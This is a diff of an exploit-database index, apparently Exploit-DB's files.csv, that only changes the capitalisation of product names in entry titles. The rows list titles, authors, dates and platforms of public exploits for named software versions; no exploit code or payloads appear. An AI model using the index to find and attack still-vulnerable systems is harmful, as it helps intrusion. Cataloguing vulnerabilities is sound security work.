GSX Server 2.0 - Authentication Server Buffer Overflow",2002-07-24,"Zag & Glcs",windows,remote,0 21640,platforms/php/webapps/21640.txt,"Cobalt Qube 3.0 - Authentication Bypass",2002-07-24,pokley,php,webapps,0 @@ -18921,7 +18921,7 @@ id,file,description,date,author,platform,type,port 21643,platforms/windows/remote/21643.c,"CodeBlue 5.1 - SMTP Response Buffer Overflow",2002-07-24,doe,windows,remote,0 21644,platforms/unix/dos/21644.txt,"Pine 4.x - Empty MIME Boundary Denial of Service",2002-07-24,"Martin J. Muench",unix,dos,0 21645,platforms/windows/dos/21645.txt,"Foxit Reader 5.4.3.0920 - Crash PoC",2012-10-01,coolkaveh,windows,dos,0 -21646,platforms/php/webapps/21646.py,"Archin WordPress Theme 3.2 - Unauthenticated Configuration Access",2012-10-01,bwall,php,webapps,0 +21646,platforms/php/webapps/21646.py,"Archin Wordpress Theme 3.2 - Unauthenticated Configuration Access",2012-10-01,bwall,php,webapps,0 21648,platforms/windows/remote/21648.txt,"Pegasus Mail 4.0 1 - Message Header Buffer Overflow",2002-07-24,"Auriemma Luigi",windows,remote,0 21649,platforms/multiple/remote/21649.txt,"CacheFlow CacheOS 3.1.x/4.0.x/4.1 - Unresolved Domain Cross-Site Scripting",2002-07-24,T.Suzuki,multiple,remote,0 21651,platforms/windows/remote/21651.txt,"Microsoft SQL Server 2000 - sp_MScopyscript SQL Injection",2002-07-25,"Cesar Cerrudo",windows,remote,0 @@ -18932,9 +18932,9 @@ id,file,description,date,author,platform,type,port 21656,platforms/hardware/dos/21656.txt,"Lucent Access Point 300/600/1500 IP Services Router - Long HTTP Request Denial of Service",2002-07-27,FX,hardware,dos,0 21657,platforms/hardware/dos/21657.txt,"HP ProCurve Switch 4000M - SNMP Write Denial of Service",2002-07-27,FX,hardware,dos,0 21658,platforms/cgi/webapps/21658.html,"Ben Chivers Easy Homepage Creator 1.0 - File Modification",2002-07-29,"Arek Suroboyo",cgi,webapps,0 -21659,platforms/cgi/webapps/21659.html,"Ben Chivers Easy Guestbook 1.0 - Administrative Access",2002-07-29,"Arek Suroboyo",cgi,webapps,0 +21659,platforms/cgi/webapps/21659.html,"Ben Chivers Easy GuestBook 1.0 - Administrative Access",2002-07-29,"Arek Suroboyo",cgi,webapps,0 21660,platforms/php/webapps/21660.txt,"phpBB2 Gender Mod 1.1.3 - SQL Injection",2002-07-29,"langtuhaohoa caothuvolam",php,webapps,0 -21661,platforms/php/webapps/21661.txt,"DotProject 0.2.1 - User Cookie Authentication Bypass",2002-07-29,pokleyzz,php,webapps,0 +21661,platforms/php/webapps/21661.txt,"dotProject 0.2.1 - User Cookie Authentication Bypass",2002-07-29,pokleyzz,php,webapps,0 21662,platforms/windows/remote/21662.txt,"Microsoft Outlook Express 6 - XML File Attachment Script Execution",2002-07-29,http-equiv,windows,remote,0 21663,platforms/linux/remote/21663.c,"Fake Identd 0.9/1.x - Client Query Remote Buffer Overflow",2002-07-25,Jedi/Sector,linux,remote,0 21665,platforms/php/webapps/21665.txt,"phptax 0.8 - Remote Code Execution",2012-10-02,"Jean Pascal Pereira",php,webapps,0 @@ -18986,7 +18986,7 @@ id,file,description,date,author,platform,type,port 21711,platforms/windows/remote/21711.html,"Microsoft Outlook Express 5/6 - MHTML URL Handler File Rendering",2002-08-15,http-equiv,windows,remote,0 21712,platforms/windows/dos/21712.txt,"Google Toolbar 1.1.60 - Search Function Denial of Service",2002-08-15,onet,windows,dos,0 21713,platforms/windows/local/21713.py,"NCMedia Sound Editor Pro 7.5.1 - (SEH + DEP Bypass)",2012-10-03,b33f,windows,local,0 -21715,platforms/php/webapps/21715.txt,"WordPress Plugin spider calendar - Multiple Vulnerabilities",2012-10-03,D4NB4R,php,webapps,0 +21715,platforms/php/webapps/21715.txt,"Wordpress Plugin spider Calendar - Multiple Vulnerabilities",2012-10-03,D4NB4R,php,webapps,0 21716,platforms/php/webapps/21716.txt,"Omnistar Mailer 7.2 - Multiple Vulnerabilities",2012-10-03,Vulnerability-Lab,php,webapps,0 21717,platforms/windows/remote/21717.txt,"Microsoft Windows XP - HCP URI Handler Abuse",2002-08-15,"Shane Hird",windows,remote,0 21718,platforms/windows/remote/21718.txt,"Microsoft SQL 2000/7.0 - Agent Jobs Privilege Elevation",2002-08-15,"David Litchfield",windows,remote,0 @@ -19083,7 +19083,7 @@ id,file,description,date,author,platform,type,port 21812,platforms/windows/remote/21812.txt,"Microsoft Word 95/97/98/2000/2002 - INCLUDEPICTURE Document Sharing File Disclosure",2002-09-20,"Richard Edwards",windows,remote,0 21813,platforms/windows/dos/21813.c,"Trillian 0.73/0.74 - IRC JOIN Buffer Overflow",2002-09-20,"Lance Fitz-Herbert",windows,dos,0 21814,platforms/linux/local/21814.c,"Alsaplayer 0.99.71 - Local Buffer Overflow",2002-09-20,zillion,linux,local,0 -21815,platforms/osx/local/21815.txt,"Apple Mac OS X 10.2 - Terminal.APP Telnet Link Command Execution",2002-09-21,"Taiyo Fujii",osx,local,0 +21815,platforms/osx/local/21815.txt,"Apple Mac OSX 10.2 - Terminal.APP Telnet Link Command Execution",2002-09-21,"Taiyo Fujii",osx,local,0 21816,platforms/windows/dos/21816.c,"Trillian 0.725/0.73/0.74 - IRC User Mode Numeric Remote Buffer Overflow",2002-09-21,"Lance Fitz-Herbert",windows,dos,0 21817,platforms/php/webapps/21817.txt,"Rudi Benkovic JAWMail 1.0 - Script Injection",2002-09-23,"Ulf Harnhammar",php,webapps,0 21818,platforms/linux/remote/21818.c,"Null HTTPd 0.5 - Remote Heap Overflow",2002-09-23,eSDee,linux,remote,0 @@ -19100,7 +19100,7 @@ id,file,description,date,author,platform,type,port 21824,platforms/windows/dos/21824.pl,"Arctic Torrent 1.2.3 - Memory Corruption (Denial of Service)",2012-10-09,"Jean Pascal Pereira",windows,dos,0 21825,platforms/php/webapps/21825.txt,"phpWebsite 0.8.2 - PHP File Include",2002-09-23,"Tim Vandermeersch",php,webapps,0 21826,platforms/windows/dos/21826.pl,"FL Studio 10 Producer Edition - SEH Based Buffer Overflow PoC",2012-10-09,Dark-Puzzle,windows,dos,0 -21827,platforms/hardware/remote/21827.txt,"HP Compaq Insight Manager Web Interface - Cross-Site Scripting",2002-09-23,"Taylor Huff",hardware,remote,0 +21827,platforms/hardware/remote/21827.txt,"HP Compaq Insight Manager - Web Interface Cross-Site Scripting",2002-09-23,"Taylor Huff",hardware,remote,0 21828,platforms/hardware/dos/21828.txt,"HP Procurve 4000M Switch - Device Reset Denial of Service",2002-09-24,"Brook Powers",hardware,dos,0 21829,platforms/php/webapps/21829.txt,"XOOPS 1.0 RC3 - HTML Injection",2002-09-24,das@hush.com,php,webapps,0 21830,platforms/windows/dos/21830.py,"Gom Player 2.1.44.5123 - (Unicode) NULL Pointer Dereference",2012-10-09,wh1ant,windows,dos,0 @@ -19144,7 +19144,7 @@ id,file,description,date,author,platform,type,port 21871,platforms/linux/local/21871.c,"GV 2.x/3.x - Malformed PDF/PS File Buffer Overflow (1)",2002-09-26,zen-parse,linux,local,0 21872,platforms/linux/local/21872.c,"GV 2.x/3.x - Malformed PDF/PS File Buffer Overflow (2)",2002-09-26,infamous42md,linux,local,0 21873,platforms/php/webapps/21873.txt,"PostNuke 0.72 - Modules.php Cross-Site Scripting",2002-09-26,"Mark Grimes",php,webapps,0 -21874,platforms/php/webapps/21874.txt,"VBulletin 2.0.3 - Calendar.php Command Execution",2002-09-27,gosper,php,webapps,0 +21874,platforms/php/webapps/21874.txt,"vBulletin 2.0.3 - Calendar.php Command Execution",2002-09-27,gosper,php,webapps,0 21875,platforms/jsp/webapps/21875.txt,"Jetty 4.1 Servlet Engine - Cross-Site Scripting",2002-09-28,Skinnay,jsp,webapps,0 21876,platforms/multiple/remote/21876.txt,"SafeTP 1.46 - Passive Mode Internal IP Address Revealing",2002-09-28,"Jonathan G. Lampe",multiple,remote,0 21877,platforms/cgi/webapps/21877.txt,"EmuMail 5.0 - Web Root Full Path Disclosure",2002-09-29,FVS,cgi,webapps,0 @@ -19207,7 +19207,7 @@ id,file,description,date,author,platform,type,port 21943,platforms/windows/dos/21943.c,"Zone Labs ZoneAlarm 3.0/3.1 - Syn Flood Denial of Service",2002-10-16,"Abraham Lincoln",windows,dos,0 21944,platforms/hardware/remote/21944.pl,"Cisco CatOS 5.x/6.1/7.3/7.4 - CiscoView HTTP Server Buffer Overflow",2002-10-16,blackangels,hardware,remote,0 21945,platforms/linux/remote/21945.pl,"PlanetDNS PlanetWeb 1.14 - Malformed Request Remote Buffer Overflow",2002-10-17,"securma massine",linux,remote,0 -21946,platforms/java/webapps/21946.txt,"VBulletin 2.0/2.2.x - Cross-Site Scripting",2002-10-18,Sp.IC,java,webapps,0 +21946,platforms/java/webapps/21946.txt,"vBulletin 2.0/2.2.x - Cross-Site Scripting",2002-10-18,Sp.IC,java,webapps,0 21947,platforms/unix/remote/21947.txt,"IBM Websphere Edge Server 3.6/4.0 - Cross-Site Scripting",2002-10-23,Rapid7,unix,remote,0 21948,platforms/unix/remote/21948.txt,"IBM Websphere Edge Server 3.69/4.0 - HTTP Header Injection",2002-10-23,Rapid7,unix,remote,0 21949,platforms/unix/dos/21949.txt,"IBM Websphere Caching Proxy 3.6/4.0 - Denial of Service",2002-10-18,Rapid7,unix,dos,0 @@ -19234,7 +19234,7 @@ id,file,description,date,author,platform,type,port 21970,platforms/php/webapps/21970.txt,"Benjamin Lefevre Dobermann Forum 0.x - newtopic.php subpath Parameter Remote File Inclusion",2002-10-28,frog,php,webapps,0 21971,platforms/hardware/dos/21971.txt,"Cisco AS5350 - Universal Gateway Portscan Denial of Service",2002-10-28,"Thomas Munn",hardware,dos,0 21972,platforms/windows/dos/21972.pl,"SmartMail Server 2.0 - Closed Connection Denial of Service",2002-10-31,"securma massine",windows,dos,0 -21973,platforms/windows/dos/21973.pl,"SmartMail Server 1.0 BETA 10 - Oversized Request Denial of Service",2002-10-31,"securma massine",windows,dos,0 +21973,platforms/windows/dos/21973.pl,"SmartMail Server 1.0 Beta 10 - Oversized Request Denial of Service",2002-10-31,"securma massine",windows,dos,0 21974,platforms/unix/remote/21974.pl,"LPRNG html2ps 1.0 - Remote Command Execution",2002-10-31,"Sebastian Krahmer",unix,remote,0 21975,platforms/hardware/dos/21975.txt,"Linksys BEFSR41 1.4x - Gozila.cgi Denial of Service",2002-11-01,"Jeep 94",hardware,dos,0 21976,platforms/php/webapps/21976.txt,"Jason Orcutt Prometheus 3.0/4.0/6.0 - Remote File Inclusion",2002-11-01,"Karol Wiesek",php,webapps,0 @@ -19289,19 +19289,19 @@ id,file,description,date,author,platform,type,port 22027,platforms/windows/remote/22027.txt,"Microsoft Java Virtual Machine 3802 Series - Bytecode Verifier",2002-11-21,"Last Stage of Delirium",windows,remote,0 22028,platforms/windows/remote/22028.txt,"Symantec Java! JustInTime Compiler 210.65 - Command Execution",2002-11-21,"Last Stage of Delirium",windows,remote,0 22029,platforms/multiple/remote/22029.txt,"Sun/Netscape Java Virtual Machine1.x - Bytecode Verifier",2002-11-21,"Last Stage of Delirium",multiple,remote,0 -22030,platforms/php/webapps/22030.php,"VBulletin 2.0/2.2.x - Memberlist.php Cross-Site Scripting",2002-11-22,Sp.IC,php,webapps,0 +22030,platforms/php/webapps/22030.php,"vBulletin 2.0/2.2.x - Memberlist.php Cross-Site Scripting",2002-11-22,Sp.IC,php,webapps,0 22031,platforms/unix/dos/22031.txt,"Rational ClearCase 4.1 - Portscan Denial of Service",2002-11-22,"Stefan Bagdohn",unix,dos,0 22032,platforms/windows/remote/22032.txt,"acFTP 1.4 - Invalid Password Weak Authentication",2002-11-25,"Matthew Murphy",windows,remote,0 22033,platforms/linux/dos/22033.txt,"WSMP3 0.0.1/0.0.2 - Multiple Buffer Overflow Vulnerabilities",2002-11-25,"dong-h0un U",linux,dos,0 22034,platforms/linux/remote/22034.pl,"WSMP3 0.0.1/0.0.2 - Remote Heap Corruption (1)",2002-11-25,"Damian Myerscough",linux,remote,0 22035,platforms/linux/remote/22035.c,"WSMP3 0.0.1/0.0.2 - Remote Heap Corruption (2)",2002-11-25,Xpl017Elz,linux,remote,0 22036,platforms/unix/remote/22036.pl,"XFree86 X11R6 3.3.x - Font Server Remote Buffer Overrun",2002-11-25,"TESO Security",unix,remote,0 -22037,platforms/php/webapps/22037.txt,"PHP-Nuke 5.x/6.0/6.5 BETA 1 - Multiple Cross-Site Scripting Vulnerabilities",2002-11-25,"Matthew Murphy",php,webapps,0 +22037,platforms/php/webapps/22037.txt,"PHP-Nuke 5.x/6.0/6.5 Beta 1 - Multiple Cross-Site Scripting Vulnerabilities",2002-11-25,"Matthew Murphy",php,webapps,0 22038,platforms/php/webapps/22038.txt,"Sisfokol 4.0 - Arbitrary File Upload",2012-10-17,"cr4wl3r ",php,webapps,0 22039,platforms/php/webapps/22039.txt,"symphony CMS 2.3 - Multiple Vulnerabilities",2012-10-17,Wireghoul,php,webapps,0 22040,platforms/jsp/webapps/22040.txt,"ManageEngine Support Center Plus 7908 - Multiple Vulnerabilities",2012-10-17,xistence,jsp,webapps,0 22041,platforms/multiple/webapps/22041.txt,"Oracle WebCenter Sites (FatWire Content Server) - Multiple Vulnerabilities",2012-10-17,"SEC Consult",multiple,webapps,0 -22042,platforms/php/webapps/22042.php,"VBulletin 2.0.x/2.2.x - members2.php Cross-Site Scripting",2002-11-25,Sp.IC,php,webapps,0 +22042,platforms/php/webapps/22042.php,"vBulletin 2.0.x/2.2.x - members2.php Cross-Site Scripting",2002-11-25,Sp.IC,php,webapps,0 22043,platforms/php/webapps/22043.txt,"phpBB 2.0.3 - Script Injection",2002-11-25,"Pete Foster",php,webapps,0 22044,platforms/php/webapps/22044.txt,"Web Server Creator Web Portal 0.1 - Remote File Inclusion",2002-11-25,frog,php,webapps,0 22045,platforms/cgi/webapps/22045.txt,"Working Resources BadBlue 1.7.1 - Search Page Cross-Site Scripting",2002-11-25,"Matthew Murphy",cgi,webapps,0 @@ -19314,7 +19314,7 @@ id,file,description,date,author,platform,type,port 22052,platforms/cgi/webapps/22052.txt,"YaBB 1 Gold - SP 1 YaBB.pl Cross-Site Scripting",2002-11-28,"Fabricio Angeletti",cgi,webapps,0 22053,platforms/multiple/dos/22053.txt,"Moby NetSuite 1.0/1.2 - POST Handler Buffer Overflow",2002-11-29,"Matthew Murphy",multiple,dos,0 22054,platforms/cgi/remote/22054.c,"Boozt Standard 0.9.8 - index.cgi Buffer Overrun",2002-11-29,BrainStorm,cgi,remote,0 -22055,platforms/linux/local/22055.txt,"SuidPerl 5.6 - Information Disclosure",2002-11-29,zen-parse,linux,local,0 +22055,platforms/linux/local/22055.txt,"SUIDPerl 5.6 - Information Disclosure",2002-11-29,zen-parse,linux,local,0 22056,platforms/linux/dos/22056.txt,"Pserv 2.0 - HTTP Version Specifier Buffer Overflow",2002-11-30,"Matthew Murphy",linux,dos,0 22057,platforms/linux/remote/22057.pl,"Pserv 2.0 - User-Agent HTTP Header Buffer Overflow (1)",2002-11-30,Sapient2003,linux,remote,0 22058,platforms/linux/remote/22058.c,"Pserv 2.0 - User-Agent HTTP Header Buffer Overflow (2)",2002-11-30,jsk,linux,remote,0 @@ -19330,10 +19330,10 @@ id,file,description,date,author,platform,type,port 22068,platforms/unix/dos/22068.pl,"Apache 1.3.x + Tomcat 4.0.x/4.1.x Mod_JK - Chunked Encoding Denial of Service",2002-12-04,Sapient2003,unix,dos,0 22069,platforms/multiple/local/22069.py,"Oracle Database - Authentication Protocol Security Bypass",2012-10-18,"Esteban Martinez Fayo",multiple,local,0 22070,platforms/windows/webapps/22070.py,"otrs 3.1 - Persistent Cross-Site Scripting",2012-10-18,"Mike Eduard",windows,webapps,0 -22071,platforms/php/webapps/22071.txt,"FireStorm Professional Real Estate WordPress Plugin 2.06.01 - SQL Injection",2012-10-18,"Ashiyane Digital Security Team",php,webapps,0 -22074,platforms/osx/dos/22074.txt,"Apple Mac OS X 10.2.2 - Directory Kernel Panic Denial of Service",2002-11-07,shibby,osx,dos,0 -22075,platforms/php/webapps/22075.txt,"Ultimate PHP Board 1.0 final beta - ViewTopic.php Directory Contents Browsing",2002-11-08,euronymous,php,webapps,0 -22076,platforms/php/webapps/22076.txt,"Ultimate PHP Board Board 1.0 final beta - ViewTopic.php Cross-Site Scripting",2002-11-08,euronymous,php,webapps,0 +22071,platforms/php/webapps/22071.txt,"FireStorm Professional Real Estate Wordpress Plugin 2.06.01 - SQL Injection",2012-10-18,"Ashiyane Digital Security Team",php,webapps,0 +22074,platforms/osx/dos/22074.txt,"Apple Mac OSX 10.2.2 - Directory Kernel Panic Denial of Service",2002-11-07,shibby,osx,dos,0 +22075,platforms/php/webapps/22075.txt,"Ultimate PHP Board 1.0 final Beta - ViewTopic.php Directory Contents Browsing",2002-11-08,euronymous,php,webapps,0 +22076,platforms/php/webapps/22076.txt,"Ultimate PHP Board Board 1.0 final Beta - ViewTopic.php Cross-Site Scripting",2002-11-08,euronymous,php,webapps,0 22077,platforms/php/webapps/22077.txt,"vBulletin 2.2.7/2.2.8 - HTML Injection",2002-11-09,"Dorin Balanica",php,webapps,0 22078,platforms/windows/remote/22078.txt,"mollensoft software enceladus server suite 2.6.1/3.9 - Directory Traversal",2002-11-09,luca.ercoli@inwind.it,windows,remote,0 22079,platforms/linux/dos/22079.sh,"ProFTPD 1.2.x - STAT Command Denial of Service",2002-12-09,"Rob klein Gunnewiek",linux,dos,0 @@ -19354,7 +19354,7 @@ id,file,description,date,author,platform,type,port 22094,platforms/windows/remote/22094.rb,"ManageEngine Security Manager Plus 5.5 build 5505 - Remote SYSTEM SQL Injection (Metasploit)",2012-10-19,xistence,windows,remote,0 22097,platforms/php/webapps/22097.txt,"Joomla Freestyle Support 1.9.1.1447 - (com_fss) SQL Injection",2012-10-19,D4NB4R,php,webapps,0 22098,platforms/php/webapps/22098.txt,"Joomla Tags - (index.php tag parameter) SQL Injection",2012-10-19,D4NB4R,php,webapps,0 -22099,platforms/php/webapps/22099.txt,"CMSQLITE 1.3.2 - Multiple Vulnerabilities",2012-10-19,Vulnerability-Lab,php,webapps,0 +22099,platforms/php/webapps/22099.txt,"CMSQLite 1.3.2 - Multiple Vulnerabilities",2012-10-19,Vulnerability-Lab,php,webapps,0 22100,platforms/windows/dos/22100.txt,"Microsoft Internet Explorer 9 - Cross-Site Scripting Filter Bypass",2012-10-19,"Jean Pascal Pereira",windows,dos,0 22101,platforms/linux/remote/22101.c,"zkfingerd 0.9.1 - say() Format String",2002-12-16,"Marceta Milos",linux,remote,0 22102,platforms/php/webapps/22102.txt,"PHP-Nuke 6.0 - Multiple Full Path Disclosure Vulnerabilities",2002-12-16,frog,php,webapps,0 @@ -19413,7 +19413,7 @@ id,file,description,date,author,platform,type,port 22154,platforms/windows/dos/22154.pl,"RealPlayer 15.0.6.14.3gp - Crash PoC",2012-10-22,coolkaveh,windows,dos,0 22156,platforms/php/webapps/22156.txt,"White Label CMS 1.5 - Cross-Site Request Forgery / Persistent Cross-Site Scripting",2012-10-22,pcsjj,php,webapps,0 22157,platforms/php/webapps/22157.txt,"Schoolhos CMS Beta 2.29 - (index.php id parameter) SQL Injection",2012-10-22,Cumi,php,webapps,0 -22158,platforms/php/webapps/22158.txt,"WordPress Plugin social discussions 6.1.1 - Multiple Vulnerabilities",2012-10-22,waraxe,php,webapps,0 +22158,platforms/php/webapps/22158.txt,"Wordpress Plugin social discussions 6.1.1 - Multiple Vulnerabilities",2012-10-22,waraxe,php,webapps,0 22159,platforms/php/webapps/22159.txt,"subrion CMS 2.2.1 - Multiple Vulnerabilities",2012-10-22,"High-Tech Bridge SA",php,webapps,0 22160,platforms/php/webapps/22160.txt,"atutor 1.2 - Multiple Vulnerabilities",2012-10-22,"High-Tech Bridge SA",php,webapps,0 22161,platforms/windows/remote/22161.rb,"Turbo FTP Server 1.30.823 - PORT Overflow",2012-10-23,Metasploit,windows,remote,21 @@ -19522,8 +19522,8 @@ id,file,description,date,author,platform,type,port 22266,platforms/php/webapps/22266.php,"PHP-Nuke 5.6/6.0 - Search Engine SQL Injection",2003-02-19,"David Zentner",php,webapps,0 22267,platforms/php/webapps/22267.php,"PHPBB2 - Page_Header.php SQL Injection",2003-02-19,"David Zentner",php,webapps,0 22268,platforms/php/webapps/22268.txt,"myPHPNuke 1.8.8 - Links.php Cross-Site Scripting",2003-02-20,"Tacettin Karadeniz",php,webapps,0 -22269,platforms/windows/remote/22269.txt,"Sage 1.0 beta 3 - Content Management System Full Path Disclosure",2003-02-20,euronymous,windows,remote,0 -22270,platforms/windows/remote/22270.txt,"Sage 1.0 beta 3 - Content Management System Cross-Site Scripting",2003-02-20,euronymous,windows,remote,0 +22269,platforms/windows/remote/22269.txt,"Sage 1.0 Beta 3 - Content Management System Full Path Disclosure",2003-02-20,euronymous,windows,remote,0 +22270,platforms/windows/remote/22270.txt,"Sage 1.0 Beta 3 - Content Management System Cross-Site Scripting",2003-02-20,euronymous,windows,remote,0 22271,platforms/hardware/remote/22271.c,"Cisco IOS 11/12 - OSPF Neighbor Buffer Overflow",2003-02-20,FX,hardware,remote,0 22272,platforms/multiple/local/22272.pl,"Perl2Exe 1.0 9/5.0 2/6.0 - Code Obfuscation",2002-02-22,"Simon Cozens",multiple,local,0 22273,platforms/linux/dos/22273.c,"Zlib 1.1.4 - Compression Library gzprintf() Buffer Overrun (1)",2003-02-23,"Richard Kettlewel",linux,dos,0 @@ -19551,7 +19551,7 @@ id,file,description,date,author,platform,type,port 22296,platforms/multiple/remote/22296.txt,"Axis Communications HTTP Server 2.x - Messages Information Disclosure",2003-02-28,"Martin Eiszner",multiple,remote,0 22297,platforms/php/webapps/22297.pl,"Typo3 3.5 b5 - Showpic.php File Enumeration",2003-02-28,"Martin Eiszner",php,webapps,0 22298,platforms/php/webapps/22298.txt,"Typo3 3.5 b5 - Translations.php Remote File Inclusion",2003-02-28,"Martin Eiszner",php,webapps,0 -22300,platforms/php/webapps/22300.txt,"WordPress Easy Webinar Plugin - Blind SQL Injection",2012-10-28,"Robert Cooper",php,webapps,0 +22300,platforms/php/webapps/22300.txt,"Wordpress Easy Webinar Plugin - Blind SQL Injection",2012-10-28,"Robert Cooper",php,webapps,0 22301,platforms/windows/remote/22301.html,"Aladdin Knowledge System Ltd - PrivAgent.ocx ChooseFilePath Buffer Overflow",2012-10-28,b33f,windows,remote,0 22302,platforms/windows/dos/22302.rb,"hMailServer 5.3.3 - IMAP Remote Crash PoC",2012-10-28,"John Smith",windows,dos,0 22303,platforms/windows/dos/22303.pl,"Microsoft Windows Help program - (WinHlp32.exe) Crash PoC",2012-10-28,coolkaveh,windows,dos,0 @@ -19622,7 +19622,7 @@ id,file,description,date,author,platform,type,port 22371,platforms/linux/remote/22371.txt,"Ximian Evolution 1.x - MIME image/* Content-Type Data Inclusion",2003-03-19,"Core Security",linux,remote,0 22372,platforms/php/webapps/22372.txt,"vam shop 1.69 - Multiple Vulnerabilities",2012-10-31,"Security Effect Team",php,webapps,0 22373,platforms/php/webapps/22373.txt,"PG Dating Pro 1.0 CMS - Multiple Vulnerabilities",2012-10-31,Vulnerability-Lab,php,webapps,0 -22374,platforms/php/webapps/22374.txt,"WordPress Plugin foxypress 0.4.2.5 - Multiple Vulnerabilities",2012-10-31,waraxe,php,webapps,0 +22374,platforms/php/webapps/22374.txt,"Wordpress Plugin foxypress 0.4.2.5 - Multiple Vulnerabilities",2012-10-31,waraxe,php,webapps,0 22375,platforms/windows/remote/22375.rb,"Aladdin Knowledge System Ltd - ChooseFilePath Buffer Overflow",2012-11-01,Metasploit,windows,remote,0 22376,platforms/linux/local/22376.txt,"GNOME Eye Of Gnome 1.0.x/1.1.x/2.2 - Format String",2003-03-28,"Core Security",linux,local,0 22377,platforms/cgi/webapps/22377.txt,"Kebi Academy 2001 - Input Validation",2003-03-17,"dong-h0un U",cgi,webapps,0 @@ -19639,12 +19639,12 @@ id,file,description,date,author,platform,type,port 22388,platforms/multiple/remote/22388.txt,"WFChat 1.0 - Information Disclosure",2003-03-19,subj,multiple,remote,0 22389,platforms/php/webapps/22389.txt,"XOOPS 2.0 XoopsOption - Information Disclosure",2003-03-20,"gregory Le Bras",php,webapps,0 22390,platforms/windows/dos/22390.c,"Microsoft ActiveSync 3.5 - Null Pointer Dereference Denial of Service",2003-03-20,"Andy Davis",windows,dos,0 -22391,platforms/php/webapps/22391.txt,"OSCommerce 2.1/2.2 - Error_Message Cross-Site Scripting",2003-03-20,"iProyectos group",php,webapps,0 -22392,platforms/php/webapps/22392.txt,"OSCommerce 2.1/2.2 - Info_Message Cross-Site Scripting",2003-03-20,"iProyectos group",php,webapps,0 -22393,platforms/php/webapps/22393.txt,"OSCommerce 2.1/2.2 - Checkout_Payment.php Error Output Cross-Site Scripting",2003-03-20,"iProyectos group",php,webapps,0 +22391,platforms/php/webapps/22391.txt,"osCommerce 2.1/2.2 - Error_Message Cross-Site Scripting",2003-03-20,"iProyectos group",php,webapps,0 +22392,platforms/php/webapps/22392.txt,"osCommerce 2.1/2.2 - Info_Message Cross-Site Scripting",2003-03-20,"iProyectos group",php,webapps,0 +22393,platforms/php/webapps/22393.txt,"osCommerce 2.1/2.2 - Checkout_Payment.php Error Output Cross-Site Scripting",2003-03-20,"iProyectos group",php,webapps,0 22394,platforms/hardware/remote/22394.txt,"Check Point FW-1 Syslog Daemon - Unfiltered Escape Sequence",2003-03-21,"Dr. Peter Bieringer",hardware,remote,0 22395,platforms/windows/dos/22395.txt,"eDonkey Clients 0.44/0.45 - Multiple Chat Dialog Resource Consumption",2003-03-21,"Auriemma Luigi",windows,dos,0 -22396,platforms/php/webapps/22396.txt,"WordPress bbpress Plugin - Multiple Vulnerabilities",2012-11-01,Dark-Puzzle,php,webapps,0 +22396,platforms/php/webapps/22396.txt,"Wordpress bbPress Plugin - Multiple Vulnerabilities",2012-11-01,Dark-Puzzle,php,webapps,0 22397,platforms/windows/dos/22397.txt,"SIEMENS Sipass Integrated 2.6 Ethernet Bus - Arbitrary Pointer Dereference",2012-11-01,"Lucas Apa",windows,dos,0 22398,platforms/php/webapps/22398.php,"Invision Power Board 3.3.4 - 'unserialize()' PHP Code Execution",2012-11-01,EgiX,php,webapps,0 22399,platforms/php/webapps/22399.txt,"Endpoint Protector 4.0.4.2 - Multiple Persistent Cross-Site Scripting",2012-11-01,"CYBSEC Labs",php,webapps,0 @@ -19673,7 +19673,7 @@ id,file,description,date,author,platform,type,port 22424,platforms/php/webapps/22424.txt,"PHP-Nuke 6.0/6.5 Forum Module - Viewforum.php SQL Injection",2003-03-25,frog,php,webapps,0 22425,platforms/php/dos/22425.php,"PHP 4.x - socket_recv() Signed Integer Memory Corruption",2003-03-26,"Sir Mordred",php,dos,0 22426,platforms/php/dos/22426.php,"PHP 4.x - socket_recvfrom() Signed Integer Memory Corruption",2003-03-26,"Sir Mordred",php,dos,0 -22427,platforms/php/webapps/22427.txt,"WordPress All Video Gallery 1.1 Plugin - SQL Injection",2012-11-02,"Ashiyane Digital Security Team",php,webapps,0 +22427,platforms/php/webapps/22427.txt,"Wordpress All Video Gallery 1.1 Plugin - SQL Injection",2012-11-02,"Ashiyane Digital Security Team",php,webapps,0 22521,platforms/php/webapps/22521.c,"XMB Forum 1.8 - Member.php SQL Injection",2003-04-22,zeez@bbugs.org,php,webapps,0 22429,platforms/php/webapps/22429.txt,"vBulletin ChangUonDyU Advanced Statistics - SQL Injection",2012-11-02,Juno_okyo,php,webapps,0 22430,platforms/php/webapps/22430.txt,"PrestaShop 1.5.1 - Persistent Cross-Site Scripting",2012-11-02,"David Sopas",php,webapps,0 @@ -19689,8 +19689,8 @@ id,file,description,date,author,platform,type,port 22440,platforms/hardware/dos/22440.c,"D-Link DI-614+ - IP Fragment Reassembly Denial of Service",1998-04-16,humble,hardware,dos,0 22441,platforms/multiple/dos/22441.txt,"Mozilla 1.x / Opera 7.0 - LiveConnect JavaScript Denial of Service",2003-03-28,"Marc Schoenefeld",multiple,dos,0 22442,platforms/unix/remote/22442.c,"SendMail 8.11.6 - Address Prescan Memory Corruption",2003-03-29,sorbo,unix,remote,0 -22443,platforms/php/webapps/22443.txt,"Beanwebb Guestbook 1.0 - Unauthorized Administrative Access",2003-03-29,euronymous,php,webapps,0 -22444,platforms/php/webapps/22444.txt,"Justice Guestbook 1.3 - Full Path Disclosure",2003-03-29,euronymous,php,webapps,0 +22443,platforms/php/webapps/22443.txt,"Beanwebb GuestBook 1.0 - Unauthorized Administrative Access",2003-03-29,euronymous,php,webapps,0 +22444,platforms/php/webapps/22444.txt,"Justice GuestBook 1.3 - Full Path Disclosure",2003-03-29,euronymous,php,webapps,0 22445,platforms/php/webapps/22445.txt,"ScozBook 1.1 - Full Path Disclosure",2003-03-29,euronymous,php,webapps,0 22446,platforms/linux/dos/22446.txt,"EZ Server 1.0 - Long Argument Local Denial of Service",2003-03-31,"gregory Le Bras",linux,dos,0 22447,platforms/windows/dos/22447.txt,"HP Instant TopTools 5.0 - Remote Denial of Service",2003-03-31,"Erik Parker",windows,dos,0 @@ -19709,7 +19709,7 @@ id,file,description,date,author,platform,type,port 22460,platforms/windows/dos/22460.txt,"Abyss Web Server 1.1.2 - Incomplete HTTP Request Denial of Service",2003-04-05,"Auriemma Luigi",windows,dos,0 22461,platforms/php/webapps/22461.txt,"Invision Board 1.1.1 - functions.php SQL Injection",2003-04-05,"Gossi The Dog",php,webapps,0 22462,platforms/multiple/remote/22462.txt,"Interbase 6.x - External Table File Verification",2003-04-05,"Kotala Zdenek",multiple,remote,0 -22463,platforms/php/webapps/22463.txt,"WordPress Spider Catalog 1.1 Plugin - HTML Code Injection / Cross-Site Scripting",2012-11-04,D4NB4R,php,webapps,0 